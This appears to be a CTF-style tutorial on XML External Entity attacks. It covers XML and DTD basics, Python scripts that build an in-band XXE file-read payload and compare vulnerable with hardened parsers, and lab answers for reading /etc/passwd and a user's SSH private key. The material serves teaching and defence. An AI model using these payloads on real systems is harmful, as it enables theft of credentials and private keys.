XML External Entity
Date: 29 December 2020
Author: Dhilip Sanjay S
What is XML?
eXtensible Markup Language - defines a set of rules for encoding documents in a format that is both human and machine readable.
It is a markup language used for storing and transporting data.
Why use XML?
Platform and programming language independent.
Data can be changed at any point in time without affecting the data presentation.
XML allows validation using DTD (Document Type Definition) and Schema.
Syntax
XML Prolog is used to specify XML version and encoding in XML document:
An XML document must contain exactly one root element. If there is no root element, the document is not well-formed and is considered an invalid XML document:
mail - root element
to, from, text - child elements
XML is case-sensitive language.
XML elements can have attributes (similar to HTML):
category - attribute
message - attribute value
XML External Entity - DTD (Document Type Definition)
DTD defines the structure and the legal elements and attributes of an XML document.
P.S: HTML has pre-defined tags and attributes, whereas in XML, we define the elements and attributes using DTD.
A DTD can be declared internally (inside the document's DOCTYPE) or externally (in a separate file that the document references).
note.dtd - the external DTD file
XML document that uses note.dtd - references it with a DOCTYPE declaration of the form !DOCTYPE note SYSTEM "note.dtd"
Understanding how DTD validates the XML:
<!DOCTYPE note> - defines the root element of the document, named note.
<!ELEMENT note (to,from,heading,body)> - defines that the note element must contain the elements "to, from, heading, body", in that order.
<!ELEMENT to (#PCDATA)> - defines the to element to be of type #PCDATA.
<!ELEMENT from (#PCDATA)> - defines the from element to be of type #PCDATA.
<!ELEMENT heading (#PCDATA)> - defines the heading element to be of type #PCDATA.
<!ELEMENT body (#PCDATA)> - defines the body element to be of type #PCDATA.
Note:
#PCDATA - Parsed Character Data: text that the parser will examine for markup and entity references, so an entity reference inside it is expanded.
Entities
Entities in DTD
Entity usage in XML
External Entities
External entity in DTD
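The note.dtd walkthrough and the entity declarations above can be observed directly from a parser. The following is an added example (not code from the original page); it folds the DTD into the document as an internal subset, declares an internal entity `writer` and an external entity `ext` (constructed names, not from the page), and uses Python's stdlib expat bindings to report what the parser saw. The external entity is declared but never referenced, so nothing is fetched here; resolving it is what the XXE section covers.

```python
import xml.parsers.expat as expat

# Constructed sample: the note document from the DTD walkthrough above,
# with the DTD written as an internal subset so the example is one string.
# "writer" is an internal entity (literal value); "ext" is an external one
# (SYSTEM identifier). Only &writer; is referenced in the content.
NOTE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
  <!ENTITY writer "Alice">
  <!ENTITY ext SYSTEM "file:///etc/hostname">
]>
<note>
  <to>Bob</to>
  <from>&writer;</from>
  <heading>Reminder</heading>
  <body>Meeting at 10.</body>
</note>
"""


def inspect_dtd(data: bytes) -> dict:
    """Parse a document with an internal DTD subset and report what the parser
    saw: declared element types, declared entities (value or SYSTEM id), and
    the text of each element after entity expansion."""
    report = {"elements": [], "entities": {}, "text": {}}
    stack = []  # (element name, accumulated text) for open elements

    def element_decl(name, model):
        report["elements"].append(name)

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones carry a SYSTEM id.
        report["entities"][name] = value if value is not None else system_id

    def start(name, attrs):
        stack.append([name, ""])

    def chars(text):
        if stack:
            stack[-1][1] += text

    def end(name):
        el, text = stack.pop()
        report["text"][el] = text.strip()

    p = expat.ParserCreate()
    p.buffer_text = True  # deliver each text run in one callback
    p.ElementDeclHandler = element_decl
    p.EntityDeclHandler = entity_decl
    p.StartElementHandler = start
    p.CharacterDataHandler = chars
    p.EndElementHandler = end
    p.Parse(data, True)
    return report


if __name__ == "__main__":
    r = inspect_dtd(NOTE_XML)
    print("declared elements:", r["elements"])
    print("declared entities:", r["entities"])
    print("text of <from> after expansion:", r["text"]["from"])
```

The point to notice is that `<from>&writer;</from>` comes back as the literal `Alice`: the application never sees the entity reference, only the expanded text. An external entity declared with `SYSTEM` behaves the same way from the application's point of view once the parser is willing to fetch it, which is the whole basis of XXE.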
XXE Attack
An XXE attack abuses a feature of XML parsers: their willingness to resolve external entities declared in a DTD. Depending on the parser and the target, the impact includes:
Denial of Service
Server-Side Request Forgery
Port scanning of internal hosts via the parser's outbound requests
Remote Code Execution (in specific parser configurations)
Two types of XXE attacks
In-band XXE: the application reflects the parsed content back, so the attacker sees the result of the XXE payload directly in the response.
Out-of-band XXE (Blind XXE): the application does not return the parsed content. The attacker has to make the parser send the data elsewhere, typically to a server they control, and read it from there.
XXE Payload
To verify that XML is parsed:
XXE to read a file from the system using the ENTITY and SYSTEM keywords:
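The file-read payload described above, run against a parser in both its vulnerable and hardened configuration. This is an added example, not code from the original page: it stands in for the target application with Python's stdlib `xml.sax`, reflects the text of a `<name>` element the way an in-band target would, and reads a constructed file in a temporary directory rather than `/etc/passwd` or `/home/falcon/.ssh/id_rsa`. The element and entity names (`root`, `name`, `xxe`) are assumptions.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects the character data of one element, the way an application
    that echoes a submitted <name> back to the user would."""

    def __init__(self, target):
        super().__init__()
        self.target = target
        self.inside = False
        self.text = ""

    def startElement(self, name, attrs):
        if name == self.target:
            self.inside = True

    def endElement(self, name):
        if name == self.target:
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.text += content


def build_xxe_payload(path: str) -> bytes:
    """In-band XXE payload: declare an external general entity whose SYSTEM
    identifier is a file:// URL, then reference it where the app reflects input."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE root [<!ENTITY xxe SYSTEM "file://' + path.encode() + b'">]>\n'
        b"<root><name>&xxe;</name></root>\n"
    )


def parse_name(payload: bytes, resolve_external: bool) -> str:
    """Parse the document and return the text of <name>.
    resolve_external=True is the vulnerable configuration: the parser fetches
    the SYSTEM id and splices the file content into the document."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector("name")
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return collector.text


def demo() -> tuple:
    """Constructed stand-in for a private key file; returns what the vulnerable
    and the hardened parser each hand back to the application."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "id_rsa")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("CONSTRUCTED-PRIVATE-KEY-MATERIAL\n")
        payload = build_xxe_payload(secret)
        leaked = parse_name(payload, resolve_external=True)
        blocked = parse_name(payload, resolve_external=False)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(blocked))
```

With `feature_external_ges` enabled the `<name>` text is the file's content; with it disabled the entity reference is dropped and the application sees an empty string. Current Python versions disable it by default, older ones resolved external entities out of the box, and other parsers (libxml2-based ones, Java's default SAX/DOM factories) have their own switches, so the check is always to confirm the setting rather than assume it. Disabling DTD processing entirely, or using a wrapper such as defusedxml in Python, is the usual hardening.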
XXE Exploiting
Try to display your own name using any payload.
See if you can read the /etc/passwd
Answer:
Steps to Reproduce:
What is the name of the user in /etc/passwd
Answer: falcon
Where is falcon's SSH key located?
Answer: /home/falcon/.ssh/id_rsa
By default, a user's SSH private key is stored in the id_rsa file inside that user's .ssh folder (keys of other types use names such as id_ed25519, so check the directory listing if id_rsa is missing).
What are the first 18 characters of falcon's private key?
Answer: MIIEogIBAAKCAQEA7b
Steps to Reproduce:
Output:
Put the key body (the base64 lines between the BEGIN and END markers, without the markers themselves) into a file and then use the head command to get the first 18 characters:
head -c 18 <FILE>